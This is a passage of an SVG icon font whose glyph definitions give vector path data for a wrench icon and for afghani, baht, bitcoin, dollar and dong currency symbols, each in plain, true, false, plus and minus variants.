m-110-2c5-40 10-78 15-117 1-6-1-8-8-7-19 2-37 4-55 10-4 1-9 2-10 8-2 33 24 91 58 106z m-73-173c-9-1-23 7-24-11-1-20 5-39 21-51 9-6 13-13 17-22 20-53 64-86 114-86 11 1 22 1 33 5 42 15 67 45 82 85 3 5 4 11 10 15 17 9 24 25 26 44 2 19 0 21-18 22-9 0-14-1-12-12 2-13 2-27-17-29-7-1-10-8-12-15-3-13-8-24-14-36-26-44-73-61-115-40-30 15-46 42-55 74-2 7-3 16-11 17-19 2-19 14-19 28 0 5 6 14-6 12z m693-172c-1 6-4 9-8 12-23 16-49 25-76 34-6 2-9 0-13-4-29-36-66-53-112-45-32 5-56 22-76 47-2 2-3 5-8 4-18-5-36-11-53-19 30-11 60-23 86-41 7-4 11-9 12-17 2-10 4-20 7-30 24-1 48-2 74-2 20 1 50 2 81 5 30 3 59 8 89 13 5 1 6 4 5 9-3 11-6 23-8 34z m-284 163c8 1 18 3 26-1 20-10 42-11 64-11 22-1 44-1 65 7 9 3 18 6 28 5 22 0 23 2 20 25 0 0 0 0 0 1 0 3-2 5-5 5-6 0-6 3-6 7-3 30-15 56-37 77-9 7-20 10-24 22-1 2-3 4-6 3-2-1-1-3-1-5-2-16-3-32-4-48-1-5-2-11-8-11-8 0-8 7-8 13 1 16 1 32 2 48 1 11-5 8-11 8-6 1-10 0-9-8 1-17 1-35 1-52 0-5-1-9-6-9-5 0-8 3-8 8l-2 22c-1 12-2 23-3 35-8-4-8-4-10-10-2-3-3-4-6-6-32-20-49-50-51-87-1-4-1-7-6-7-5 1-6-2-6-7 0-4 0-8 0-12-1-9 2-12 11-12z m133 107c26-19 37-43 39-72 1-4-2-6-5-7-13-4-26-6-39-7-4-1-5 0-5 4 3 26 7 53 10 82z m-74-2c3-27 6-53 10-79 0-4-1-6-5-5-13 1-26 3-38 7-3 1-6 1-6 6-2 22 16 61 39 71z m-50-117c-6-1-16 5-16-8-1-14 3-26 15-34 5-5 8-9 11-15 14-36 44-59 77-59 8 1 15 1 23 4 28 10 45 30 56 57 1 4 2 8 6 10 11 7 16 18 18 30 1 13 0 15-13 15-6 0-9 0-8-8 2-9 2-18-11-20-5 0-7-5-8-10-2-8-6-16-10-24-17-30-49-42-78-27-21 10-31 28-37 50-1 5-3 11-8 11-13 2-12 10-12 19-1 4 3 10-5 9z" />
<glyph glyph-name="wrench" horiz-adv-x="1000" unicode="&#xe9c4;" d="M812 731c21-9 39-21 54-36 64-62 87-138 61-223-25-86-86-137-173-154-30-6-61-3-92-8-46-8-91-22-132-46-11-6-20-13-29-23-76-81-151-162-228-243-55-59-143-52-190 13-35 50-24 124 24 160 129 98 258 196 388 293 9 7 12 12 9 24-5 19-7 39-5 59 0 9 4 13 14 13 40 0 79 0 119 0 40 0 80 0 120-1 6 0 12 2 16 7 1 1 1 1 2 2 13 13 31 24 39 40s2 37 2 56c1 22 0 44 1 67z m-614-579c-33 0-60-26-60-58 0-32 26-60 58-60 35 0 60 26 60 61 0 32-26 57-58 57z m400 225c7-2 11 3 15 10 14 27 29 54 44 82 7 13 4 23-9 31-14 8-28 5-35-8-14-25-28-50-41-75-11-20 2-41 26-40z m78-1c7-1 11 3 15 10 15 29 31 57 46 86 2 4 4 7 3 11-4 12-14 19-25 21-11 2-20-2-25-13-13-25-27-49-40-74-11-20 1-41 26-41z m78 1c6-1 11 2 15 9 15 29 31 58 47 87 1 3 4 5 3 9-4 12-13 20-25 22-10 2-19-1-25-12-13-25-27-50-41-75-11-20 2-41 26-40z m-172 228c-21 0-42 0-63 0-6 0-9 1-6 8 26 62 70 105 133 128 8 3 9 0 9-7 0-39 0-79 0-119 0-9-4-10-11-10-21 0-41 0-62 0z" />
<glyph glyph-name="afghani-false" horiz-adv-x="1000" unicode="&#xe9c5;" d="M411 378c-23 22-53 36-86 37h-5c-35 0-67-14-90-37-23-23-37-55-37-90 0-18 3-36 10-51 6-15 16-29 27-40 23-23 55-37 90-37 71 0 128 57 128 128 0 35-14 67-37 90z m-38-122l-21-21-32 32-32-32-21 21 32 32-32 31 21 21 32-31 32 31 21-21-32-31 32-32z m398 231c-28 84-60 126-95 126-40 0-85-29-135-89-48-56-71-100-71-133 0-18 12-35 38-50 23-13 44-20 64-20 38 0 72 12 102 34l44 55c15-30 23-52 27-68 9-24 12-54 11-89h-276c-2-38-22-72-51-93h326c21 0 38 51 52 155 1 45-11 102-36 172z m-157-70c-13 0-22 2-28 4-31 17-46 31-46 41 3 12 14 26 32 43 17 17 32 26 43 26 14 1 30-10 51-33 19-22 31-43 38-63-22-12-52-18-90-18z m-12-301v-176l-72-28v180l72 24z m-5 617l-17-93-99 55 17 93 99-55z" />
<glyph glyph-name="afghani-minus" horiz-adv-x="1000" unicode="&#xe9c6;" d="M411 378c-23 22-53 36-86 37h-5c-35 0-67-14-90-37-23-23-37-55-37-90 0-18 3-36 10-51 6-15 16-29 27-40 23-23 55-37 90-37 71 0 128 57 128 128 0 35-14 67-37 90z m-32-107h-118v33h118v-33z m392 216c-28 84-60 126-95 126-40 0-85-29-135-89-48-56-71-100-71-133 0-18 12-35 38-50 23-13 44-20 64-20 38 0 72 12 102 34l44 55c15-30 23-52 27-68 9-24 12-54 11-89h-276c-2-38-22-72-51-93h326c21 0 38 51 52 155 1 45-11 102-36 172z m-157-70c-13 0-22 2-28 4-31 17-46 31-46 41 3 12 14 26 32 43 17 17 32 26 43 26 14 1 30-10 51-33 19-22 31-43 38-63-22-12-52-18-90-18z m-12-301v-176l-72-28v180l72 24z m-5 617l-17-93-99 55 17 93 99-55z" />
<glyph glyph-name="afghani-plus" horiz-adv-x="1000" unicode="&#xe9c7;" d="M411 378c-22 22-53 36-86 37h-5c-35 0-67-14-90-37-23-23-38-55-38-90 0-19 4-36 11-51 7-15 16-29 27-40 23-23 55-37 91-37 70 0 127 57 127 128 0 35-14 67-37 90z m-30-109h-42v-42h-37v42h-42v37h42v42h37v-42h42v-37z m390 218c-28 84-60 126-95 126-39 0-84-29-135-89-47-56-71-100-71-133 0-18 13-35 38-50 23-13 45-20 64-20 38 0 72 12 102 34l45 55c14-30 22-52 27-68 8-24 12-54 11-89h-276c-3-38-23-72-52-93h326c21 0 38 51 53 155 0 45-12 102-37 172z m-157-70c-13 0-22 2-28 4-30 17-46 31-46 41 3 12 14 26 32 43 18 17 32 26 44 26 13 1 30-10 50-33 19-22 31-43 38-63-22-12-51-18-90-18z m-12-301v-176l-71-28v180l71 24z m-5 617l-17-93-99 55 17 93 99-55z" />
<glyph glyph-name="afghani-true" horiz-adv-x="1000" unicode="&#xe9c8;" d="M411 378c-23 22-53 36-86 37h-5c-35 0-67-14-90-37-23-23-37-55-37-90 0-18 3-36 10-51 6-15 16-29 27-40 23-23 55-37 90-37 71 0 128 57 128 128 0 35-14 67-37 90z m-24-61l-79-78c-1-2-5-2-7 0l-47 48c-3 2-3 5 0 7l11 12c2 2 5 2 7 0l33-33 63 63c2 2 5 2 7 0l12-11c2-2 2-6 0-8z m384 170c-28 84-60 126-95 126-40 0-85-29-135-89-48-56-71-100-71-133 0-18 12-35 38-50 23-13 44-20 64-20 38 0 72 12 102 34l44 55c15-30 23-52 27-68 9-24 12-54 11-89h-276c-2-38-22-72-51-93h326c21 0 38 51 52 155 1 45-11 102-36 172z m-157-70c-13 0-22 2-28 4-31 17-46 31-46 41 3 12 14 26 32 43 17 17 32 26 43 26 14 1 30-10 51-33 19-22 31-43 38-63-22-12-52-18-90-18z m-12-301v-176l-72-28v180l72 24z m-5 617l-17-93-99 55 17 93 99-55z" />
<glyph glyph-name="afghani" horiz-adv-x="1000" unicode="&#xe9c9;" d="M705 487c-28 84-60 126-95 126-40 0-85-30-135-89-48-56-71-100-71-133 0-18 13-35 38-50 23-13 44-20 64-20 38 0 72 11 102 34l44 55c14-30 23-52 27-68 8-24 12-54 11-89h-414l-17-93h430c21 0 38 52 52 155 0 45-12 102-36 172z m-157-70c-13 0-22 1-28 4-31 17-46 31-46 41 3 12 14 26 31 43 18 17 33 26 44 26 13 2 30-10 51-34 18-21 31-42 38-62-22-12-52-18-90-18z m-12-301v-176l-72-28v180l72 24z m-5 617l-17-93-99 55 16 93 100-55z" />
<glyph glyph-name="baht-false" horiz-adv-x="1000" unicode="&#xe9ca;" d="M789 129c-22 22-52 36-85 37h-5c-35 0-67-14-89-37-24-23-38-55-38-90 0-17 4-35 11-50 6-15 15-28 26-40 23-22 55-36 90-36 70 0 127 56 127 126 0 35-14 67-37 90z m-38-121l-20-21-32 32-31-32-21 21 31 31-31 32 21 21 31-32 31 32 21-21-31-32 31-31z m-129 272c-11 21-23 38-38 51-15 14-31 24-48 31-18 7-34 11-48 13 13 2 25 7 38 15 12 9 24 19 34 32s18 28 24 45c6 17 8 36 8 56 0 34-6 62-19 84-13 23-31 40-54 54-23 13-49 23-80 28l-11 2v97h-98v-90c-34 0-63-1-86-3-26-2-49-4-69-8v-673c35-4 67-7 95-9 20-1 40-1 60-2v-91h98v95c12 1 23 2 34 4 25 4 47 11 67 20-1 9-2 18-2 28 0 68 47 126 110 142v2c-1 30-5 55-15 77z m-312 314c12 2 27 3 44 3 13 0 25-1 38-4 13-2 24-6 35-13 10-6 18-15 25-27 6-11 10-26 10-44 0-19-3-34-9-47-5-12-13-21-23-28-10-8-22-13-35-16-14-2-28-4-44-4h-41v180z m174-433c-8-13-18-22-31-29-12-8-26-13-40-15-14-3-28-4-41-4-10 0-20 1-32 1-11 1-21 2-30 3v195h56c19 0 37-2 53-5 16-3 30-9 41-17 12-7 21-18 27-30 6-13 9-29 9-49 0-20-4-37-12-50z" />
<glyph glyph-name="baht-minus" horiz-adv-x="1000" unicode="&#xe9cb;" d="M789 129c-22 22-52 36-85 37h-5c-35 0-67-14-89-37-24-23-38-55-38-90 0-17 4-35 11-50 6-15 15-28 26-40 23-22 55-36 90-36 70 0 127 56 127 126 0 35-14 67-37 90z m-32-106h-116v33h116v-33z m-135 257c-11 21-23 38-38 51-15 14-31 24-48 31-18 7-34 11-48 13 13 2 25 7 38 15 12 9 24 19 34 32s18 28 24 45c6 17 8 36 8 56 0 34-6 62-19 84-13 23-31 40-54 54-23 13-49 23-80 28l-11 2v97h-98v-90c-34 0-63-1-86-3-26-2-49-4-69-8v-673c35-4 67-7 95-9 20-1 40-1 60-2v-91h98v95c12 1 23 2 34 4 25 4 47 11 67 20-1 9-2 18-2 28 0 68 47 126 110 142v2c-1 30-5 55-15 77z m-312 314c12 2 27 2 44 2 13 0 25-1 38-3 13-2 24-6 35-13 10-6 18-15 25-27 6-11 10-26 10-44 0-19-3-34-9-47-5-12-13-21-23-29-10-7-22-12-35-15-14-2-28-4-44-4h-41v180z m174-433c-8-13-18-22-31-29-12-8-26-13-40-15-14-3-28-4-41-4-10 0-20 1-32 1-11 1-21 2-30 3v195h56c19 0 37-2 53-5 16-3 30-9 41-17 12-7 21-18 27-30 6-13 9-29 9-49 0-20-4-37-12-50z" />
<glyph glyph-name="baht-plus" horiz-adv-x="1000" unicode="&#xe9cc;" d="M789 129c-22 22-52 36-85 37h-5c-35 0-67-14-90-37-22-23-37-55-37-90 0-17 4-35 11-50 6-15 15-28 26-40 23-22 55-36 90-36 70 0 127 56 127 126 0 35-14 67-37 90z m-30-108h-41v-42h-37v42h-42v37h42v41h37v-41h41v-37z m-137 259c-10 21-23 38-38 51-15 14-31 24-48 31-18 7-34 11-48 13 13 2 25 7 38 15 13 9 24 19 34 32 10 13 18 28 24 45 6 17 9 36 9 56 0 34-7 62-20 84-13 23-31 40-54 54-22 13-49 23-80 28l-11 2v97h-98v-90c-34 0-63-1-86-3-26-2-49-4-69-8v-673c35-4 67-7 95-9 20-1 40-1 61-2v-91h97v95c12 1 23 2 35 4 24 4 46 11 66 20-1 9-2 18-2 28 0 68 47 126 110 142v2c-1 30-5 55-15 77z m-312 314c12 2 27 2 44 2 13 0 25-1 38-3 13-2 24-6 35-13 10-6 18-15 25-27 6-11 10-26 10-44 0-19-3-34-9-47-5-12-13-21-23-29-10-7-22-12-35-15-14-2-28-4-44-4h-41v180z m174-433c-8-13-18-22-31-29-12-8-26-13-40-15-14-3-28-4-41-4-10 0-20 1-32 1-11 1-21 2-30 3v195h56c19 0 37-2 53-5 16-3 30-9 41-17 12-7 21-18 27-30 6-13 9-29 9-49 0-20-4-37-12-50z" />
<glyph glyph-name="baht-true" horiz-adv-x="1000" unicode="&#xe9cd;" d="M789 129c-22 22-52 36-85 37h-5c-35 0-67-14-89-37-24-23-38-55-38-90 0-17 4-35 11-50 6-15 15-28 26-40 23-22 55-36 90-36 70 0 127 56 127 126 0 35-14 67-37 90z m-24-60l-78-78c-1-2-5-2-7 0l-47 48c-2 2-2 5 0 7l11 11c2 3 5 3 7 0l33-32 62 62c2 3 6 3 8 0l11-11c2-2 2-5 0-7z m-143 211c-11 21-23 38-38 51-15 14-31 24-48 31-18 7-34 11-48 13 13 2 25 7 38 15 12 9 24 19 34 32 10 13 18 28 24 45 6 17 8 36 8 56 0 34-6 62-19 84-13 23-31 40-54 54-23 13-49 23-80 28l-11 2v97h-98v-90c-34 0-63-1-86-3-26-2-49-4-69-8v-673c35-4 67-7 95-9 20-1 40-1 60-2v-91h98v95c12 1 23 2 34 4 25 4 47 11 67 20-1 9-2 18-2 28 0 68 47 126 110 142v2c-1 30-5 55-15 77z m-312 314c12 2 27 2 44 2 13 0 25-1 38-3 13-2 24-6 35-13 10-6 18-15 25-27 6-11 10-26 10-44 0-19-3-34-9-47-5-12-13-21-23-29-10-7-22-12-35-15-14-2-28-4-44-4h-41v180z m174-433c-8-13-18-22-31-29-12-8-26-13-40-15-14-3-28-4-41-4-10 0-20 1-32 1-11 1-21 2-30 3v195h56c19 0 37-2 53-5 16-3 30-9 41-17 12-7 21-18 27-30 6-13 9-29 9-49 0-20-4-37-12-50z" />
<glyph glyph-name="baht" horiz-adv-x="1000" unicode="&#xe9ce;" d="M716 280c-10 21-22 38-37 52-15 13-31 23-49 30-17 7-33 11-48 13 13 2 26 7 39 16s23 19 33 31c10 13 18 28 24 45 6 18 9 36 9 56 0 34-6 62-19 84-14 23-31 41-54 54-23 13-50 23-80 28-4 1-8 1-12 2v97h-97v-90c-34 0-63-1-87-3-26-2-49-4-69-7v-674c35-4 67-7 95-9 20-1 41-1 61-2v-91h97v95c12 1 24 2 35 4 34 6 64 16 90 31 26 15 46 35 61 61 16 26 23 59 23 100 0 30-5 55-15 77z m-311 314c12 2 26 3 44 3 12 0 25-1 38-4 12-2 24-6 34-13 10-6 19-15 25-27s10-26 10-44c0-19-3-34-8-46s-14-22-24-30c-10-7-21-12-35-15-13-2-27-4-43-4h-41l0 180z m174-433c-8-12-19-22-31-30-13-7-26-12-40-14-15-2-28-4-41-4-10 0-20 1-32 1-11 1-21 2-30 3v194h56c19 0 37-1 53-4 16-3 30-9 41-17 12-7 21-18 27-30 6-13 9-29 9-49 0-20-4-37-12-50z" />
<glyph glyph-name="bitcoin-false" horiz-adv-x="1000" unicode="&#xe9cf;" d="M814 132c-22 22-53 36-86 38h-5c-35 0-68-15-91-38-23-23-38-55-38-91 0-18 4-35 11-51 6-15 16-29 27-40 23-23 56-38 91-38 71 0 129 58 129 129 0 36-15 68-38 91z m-38-123l-21-21-32 32-32-32-21 21 31 32-31 32 21 21 32-32 32 32 21-21-32-32 32-32z m-121 208c-1 15-5 30-10 43-7 20-17 38-30 53-13 15-29 28-48 38-18 9-38 16-59 18v3c35 11 64 30 86 56 22 26 33 60 33 101 0 32-6 60-18 83-12 23-28 41-48 56-20 14-43 25-68 31-10 3-20 5-30 6v82h-83v-78h-37v78h-83v-78h-112v-718h111v-79h84v79h36v-79h84v84c10 1 19 3 28 5 20 4 38 10 54 18-4 15-7 31-7 48 0 72 50 133 117 150z m-385 383h101c47 0 81-8 102-23 21-15 32-39 32-70 0-27-10-49-31-65-20-17-51-25-92-25h-112l0 183z m250-450c-10-14-22-25-37-32-15-8-32-12-50-14-18-2-34-3-50-3h-113v206h118c50 0 87-7 110-22 24-15 36-41 36-79 0-24-5-42-14-56z" />
<glyph glyph-name="bitcoin-minus" horiz-adv-x="1000" unicode="&#xe9d0;" d="M814 132c-22 22-53 36-86 38h-5c-35 0-68-15-91-38-23-23-38-55-38-91 0-18 4-35 11-51 6-15 16-29 27-40 23-23 56-38 91-38 71 0 129 58 129 129 0 36-15 68-38 91z m-32-108h-118v34h118v-34z m-127 193c-1 15-5 30-10 43-7 20-17 38-30 53-13 15-29 28-48 38-18 9-38 16-59 18v3c35 11 64 30 86 56 22 26 33 60 33 101 0 32-6 60-18 83-12 23-28 41-48 56-20 14-43 25-68 31-10 3-20 5-30 6v83h-83v-79h-37v79h-83v-79h-112v-718h111v-79h84v79h36v-79h84v84c10 1 19 3 28 5 20 4 38 10 54 18-4 15-7 31-7 48 0 72 50 133 117 150z m-385 383h101c47 0 81-8 102-23 21-15 32-39 32-70 0-27-10-49-31-65-20-17-51-25-92-25h-112l0 183z m250-450c-10-14-22-25-37-32-15-8-32-12-50-14-18-2-34-3-50-3h-113v206h118c50 0 87-7 110-22 24-15 36-41 36-79 0-24-5-42-14-56z" />
<glyph glyph-name="bitcoin-plus" horiz-adv-x="1000" unicode="&#xe9d1;" d="M814 132c-22 22-53 36-86 38h-5c-35 0-67-15-91-38-23-23-38-55-38-91 0-18 4-35 11-51 7-15 16-29 27-40 24-23 55-38 91-38 71 0 129 58 129 129 0 36-14 68-38 91z m-30-110h-42v-42h-37v42h-42v38h42v42h37v-42h42v-38z m-129 195c-1 15-5 30-10 43-7 20-18 38-31 53-13 15-28 28-47 38-18 10-38 16-60 18v3c36 11 65 30 87 56 22 26 33 60 33 101 0 32-6 60-19 83-12 23-28 41-48 56-19 14-42 25-67 31-10 3-20 5-31 6v83h-83v-79h-37v79h-83v-79h-112v-718h112v-79h83v79h37v-79h83v84c10 1 20 3 29 5 19 4 37 10 54 18-5 15-7 31-7 48 0 72 49 133 117 150z m-385 383h101c47 0 81-8 102-23 21-15 32-39 32-70 0-27-11-49-31-65-21-17-51-25-92-25h-112v183z m249-450c-10-14-22-25-37-32-15-8-31-12-49-14-18-2-35-3-50-3h-113v206h118c49 0 86-7 110-22 24-15 35-41 35-79 0-24-4-42-14-56z" />
<glyph glyph-name="bitcoin-true" horiz-adv-x="1000" unicode="&#xe9d2;" d="M814 132c-22 22-53 36-86 38h-5c-35 0-68-15-91-38-23-23-38-55-38-91 0-18 4-35 11-51 6-15 16-29 27-40 23-23 56-38 91-38 71 0 129 58 129 129 0 36-15 68-38 91z m-24-61l-79-79c-2-2-5-2-7 0l-48 49c-2 2-2 5 0 7l11 12c2 2 6 2 8 0l33-33 63 63c2 3 5 3 8 0l11-11c2-2 2-6 0-8z m-135 146c-1 15-5 30-10 43-7 20-17 38-30 53-13 15-29 28-48 38-18 9-38 16-59 18v3c35 11 64 30 86 56 22 26 33 60 33 101 0 32-6 60-18 83-12 23-28 41-48 56-20 14-43 25-68 31-10 3-20 5-30 6v83h-83v-79h-37v79h-83v-79h-112v-718h111v-79h84v79h36v-79h84v84c10 1 19 3 28 5 20 4 38 10 54 18-4 15-7 31-7 48 0 72 50 133 117 150z m-385 383h101c47 0 81-8 102-23 21-15 32-39 32-70 0-27-10-49-31-65-20-17-51-25-92-25h-112l0 183z m250-450c-10-14-22-25-37-32-15-8-32-12-50-14-18-2-34-3-50-3h-113v206h118c50 0 87-7 110-22 24-15 36-41 36-79 0-24-5-42-14-56z" />
<glyph glyph-name="bitcoin" horiz-adv-x="1000" unicode="&#xe9d3;" d="M744 260c-8 20-18 38-31 53s-29 28-47 38-39 16-60 18v2c36 12 64 31 86 57 23 27 34 60 34 101 0 32-7 60-19 83-12 23-28 41-48 56-20 15-43 25-68 31-10 3-20 5-30 6v83h-83v-79h-37v79h-83v-79h-112v-718h112v-79h83v79h37v-79h83v84c10 1 19 3 29 5 31 7 59 18 83 34 25 16 44 37 59 63 15 26 23 59 23 98 0 23-4 44-11 64z m-173 317c21-15 32-39 32-70 0-27-10-48-31-65-20-17-51-25-92-25h-112v183h102c46 0 80-8 101-23z m47-427c-10-14-23-25-37-32-15-8-32-12-50-14-18-2-34-3-50-3h-113v206h118c50 0 87-7 111-22 23-15 35-41 35-79 0-24-5-42-14-56z" />
<glyph glyph-name="dollar-flase" horiz-adv-x="1000" unicode="&#xe9d4;" d="M522 115c0 45 19 87 48 116 17 17 38 30 61 38-2 8-4 16-6 22-8 22-18 40-32 55-14 14-30 27-50 37-20 10-41 20-65 29l-57 22c-10 4-19 8-29 12s-18 9-26 15c-7 6-13 14-18 22-4 9-6 20-6 32 0 16 3 29 8 39 6 10 13 17 22 22 9 5 19 9 30 10 11 2 22 3 33 3 18 0 33 0 47-2 14-2 27-4 38-6 11-3 21-6 31-10s20-7 29-11c17 35 27 71 31 108-31 11-61 19-89 25-16 3-32 5-49 7v88h-129v-97c-3-1-6-2-9-3-28-8-53-21-73-38s-36-37-47-62c-11-25-17-53-17-85 0-27 4-50 10-69 7-19 16-35 28-49 12-13 27-25 44-35s37-19 58-27l58-22c11-4 22-9 33-13 11-5 21-11 29-18 9-7 16-16 21-26 5-10 8-22 8-38 0-30-11-53-34-68-23-14-54-22-94-22-27 0-52 3-75 8-24 6-49 14-75 24-7-20-13-40-18-60-5-20-9-39-11-57 16-7 31-12 46-17 15-4 29-8 44-10 15-3 31-5 47-7 9 0 18-1 27-1v-84h129v96c4 1 8 2 13 4 21 7 40 15 57 26-3 4-5 8-7 12-9 20-14 42-14 65z m262 90c-23 22-53 36-86 38h-5c-35 0-67-15-90-38-23-23-38-55-38-90 0-18 4-35 11-51 6-15 16-28 27-40 23-23 55-37 90-37 71 0 128 57 128 128 0 35-14 67-37 90z m-38-122l-21-21-32 32-32-32-21 21 32 32-32 32 21 21 32-32 32 32 21-21-32-32 32-32z" />
<glyph glyph-name="dollar-minus" horiz-adv-x="1000" unicode="&#xe9d5;" d="M522 115c0 45 19 87 48 116 17 17 38 30 61 38-2 8-4 16-6 22-8 22-18 40-32 55-14 14-30 27-50 37s-41 20-65 29l-57 22c-10 4-19 8-29 12s-18 9-26 15c-7 6-13 14-18 22-4 9-6 20-6 32 0 16 3 29 8 39 6 10 13 17 22 22 9 5 19 9 30 10 11 2 22 3 33 3 18 0 33 0 47-2 14-2 27-4 38-6 11-3 21-6 31-10s20-7 29-11c17 35 27 71 31 108-31 11-61 19-89 25-16 3-32 5-49 7v88h-129v-97c-3-1-6-2-9-3-28-8-53-21-73-38s-36-37-47-62c-11-25-17-53-17-85 0-27 4-50 10-69 7-19 16-35 28-49 12-13 27-25 44-35 17-10 36-19 58-27l58-22c11-4 22-9 33-13 11-5 20-11 29-18 9-7 16-16 21-26 5-10 8-22 8-38 0-30-11-53-34-68-23-14-54-22-94-22-27 0-52 3-75 8-24 6-49 14-75 24-7-20-13-40-18-60-5-20-9-39-11-57 16-7 31-12 46-17 14-4 29-8 44-10 15-3 31-5 47-7 9 0 18-1 27-1v-84h128v96c5 1 9 2 14 4 21 7 40 15 56 26-2 4-4 8-6 12-9 20-14 42-14 65z m261 90c-22 22-52 36-85 38h-5c-35 0-67-15-90-38-24-23-38-55-38-90 0-18 4-35 11-51 6-15 15-28 27-40 23-23 55-37 90-37 71 0 128 57 128 128 0 35-15 67-38 90z m-31-107h-118v34h118v-34z" />
<glyph glyph-name="dollar-plus" horiz-adv-x="1000" unicode="&#xe9d6;" d="M522 115c0 45 18 87 48 116 17 17 37 30 60 38-1 8-3 16-6 22-7 22-18 40-31 55-14 14-31 27-50 37-20 10-42 20-66 29l-57 22c-9 4-19 8-28 12-10 4-18 9-26 15-8 6-14 14-18 22-4 9-7 20-7 32 0 16 3 29 9 39 6 10 13 17 22 22 9 5 19 9 30 10 11 2 22 3 33 3 17 0 33 0 47-2 14-2 26-4 38-6 11-3 21-6 31-10s19-7 29-11c16 35 26 71 30 108-31 11-60 19-89 25-15 3-32 5-49 7v88h-128v-97c-3-1-6-2-9-3-29-8-53-21-73-38s-36-37-47-62c-12-25-17-53-17-85 0-27 3-50 10-69 7-19 16-35 28-49 12-13 27-25 44-35s36-19 58-27l57-22c12-4 23-9 34-13 10-5 20-11 29-18s15-16 21-26c5-10 8-22 8-38 0-30-12-53-35-68-22-14-54-22-94-22-26 0-51 3-75 8-23 6-48 14-75 24-7-20-13-40-18-60-5-20-8-39-10-57 16-7 31-12 46-17 14-4 29-8 44-10 15-3 30-5 47-7 8 0 17-1 27-1v-84h128v96c5 1 9 2 13 4 21 7 40 15 57 26-2 4-5 8-6 12-9 20-14 42-14 65z m261 90c-22 22-53 36-86 38h-4c-36 0-68-15-91-38-23-23-37-55-37-90 0-18 3-35 10-51 7-15 16-28 27-40 23-23 55-37 91-37 70 0 128 57 128 128-1 35-15 67-38 90z m-30-109h-42v-42h-37v42h-42v38h42v41h37v-41h42v-38z" />
<glyph glyph-name="dollar-true" horiz-adv-x="1000" unicode="&#xe9d7;" d="M522 115c0 45 18 87 48 116 16 17 37 30 60 38-2 8-4 16-6 22-8 22-18 40-32 55-14 14-30 27-50 37s-41 20-65 29l-57 22c-10 4-19 8-29 12-9 4-18 9-25 15-8 6-14 14-18 22-5 9-7 20-7 32 0 16 3 29 9 39 5 10 13 17 21 22 9 5 19 9 30 10 11 2 22 3 33 3 18 0 34 0 48-2 13-2 26-4 37-6 11-3 22-6 31-10s20-7 29-11c17 35 27 71 31 108-31 11-61 19-89 25-16 3-32 5-49 7v88h-129v-97c-3-1-6-2-9-3-28-8-53-21-73-38-20-17-36-37-47-62-11-25-17-53-17-85 0-27 4-50 10-69 7-19 16-35 28-49 12-13 27-25 44-35 17-10 37-19 58-27l58-22c11-4 22-9 33-13 11-5 21-11 29-18 9-7 16-16 21-26 5-10 8-22 8-38 0-30-11-53-34-68-23-14-54-22-94-22-27 0-52 3-75 8-24 6-49 14-75 24-7-20-13-40-18-60-5-20-9-39-11-57 16-7 31-12 46-17 15-4 29-8 44-10 15-3 31-5 47-7 9 0 18-1 27-1v-84h129v96c4 1 8 2 13 4 21 7 40 15 57 26-3 4-5 8-7 12-9 20-13 42-13 65z m262 90c-22 22-52 36-85 38h-5c-35 0-67-15-90-38-24-23-38-55-38-90 0-18 4-35 11-51 6-15 15-28 27-40 23-23 55-37 90-37 71 0 128 57 128 128 0 35-15 67-38 90z m-24-60l-78-79c-2-2-5-2-7 0l-48 48c-2 2-2 6 0 8l12 11c2 2 5 2 7 0l33-32 62 62c3 3 6 3 8 0l11-11c2-2 2-5 0-7z" />
<glyph glyph-name="dollar" horiz-adv-x="1000" unicode="&#xe9d8;" d="M717 291c-8 22-19 40-32 55-14 14-31 27-50 37s-42 20-66 29l-57 22c-9 4-19 8-28 12-10 4-18 9-26 15-7 6-13 14-18 22-4 9-6 20-6 32 0 16 3 29 8 39 6 10 13 17 22 22 9 5 19 9 30 10 11 2 22 3 33 3 17 0 33 0 47-2 14-2 27-4 38-6 11-3 21-6 31-10s20-7 29-11c17 35 27 71 30 108-31 11-60 19-88 25-16 3-33 5-50 7v88h-128v-97c-3-1-6-2-9-3-29-8-53-21-73-38-20-17-36-37-47-62-11-25-17-53-17-85 0-27 4-50 10-69 7-19 16-35 28-49 12-13 27-25 44-35s36-19 58-27l58-22c11-4 22-9 33-13 11-5 20-11 29-18 9-7 16-16 21-26 5-10 8-22 8-38 0-30-11-53-34-68-23-14-54-22-94-22-27 0-52 3-75 8-24 6-49 14-75 24-7-20-13-40-18-60-5-20-9-39-11-57 16-7 31-12 46-17 14-4 29-8 44-10 15-3 31-5 47-7 8 0 17-1 27-1v-84h128v96c5 1 9 2 14 4 32 10 60 25 82 44 22 19 39 42 51 69 11 26 17 56 17 88 0 31-4 57-11 78z" />
<glyph glyph-name="dong-false" horiz-adv-x="1000" unicode="&#xe9d9;" d="M791 134c-22 23-53 37-87 39h-5c-36 0-68-15-92-39-23-23-38-55-38-91 0-19 4-36 11-52 6-15 16-29 27-40 24-24 56-38 92-38 72 0 130 58 130 130 0 35-14 68-38 91z m-38-124l-22-21-32 32-32-32-21 21 32 33-32 32 21 21 32-32 32 32 22-21-32-32 32-33z m-95 697h-64v76c-10 2-21 3-31 4-11 0-21 1-31 1-10 0-20-1-30-1-11-1-21-2-32-4v-76h-145c-2-12-2-23-2-35 0-12 0-23 2-35h145v-131c-11 3-21 5-33 6-11 1-22 1-33 1-35 0-67-7-96-19s-53-31-74-53c-20-23-36-49-47-79-10-30-16-63-16-97 0-43 7-80 19-110 13-30 30-55 52-73 21-19 47-33 75-42 29-9 59-13 90-13 36 0 68 2 95 6-1 3-1 7-1 10 0 64 38 120 93 145v449h64c1 11 2 23 2 35 0 12 0 23-2 35z m-188-567c-10-3-19-5-27-6-9-1-17-2-28-2-16 0-31 3-45 7-15 4-27 12-37 22-10 10-18 24-24 41-6 17-9 38-9 63 0 20 2 39 6 57 5 18 12 34 21 48 10 13 22 24 36 32 14 8 31 12 51 12 11 0 20 0 27-1 8-1 17-3 29-6v-267z m99-228h-329c-1 12-2 23-2 35 0 12 1 24 2 35h273c12-28 31-52 56-70z" />
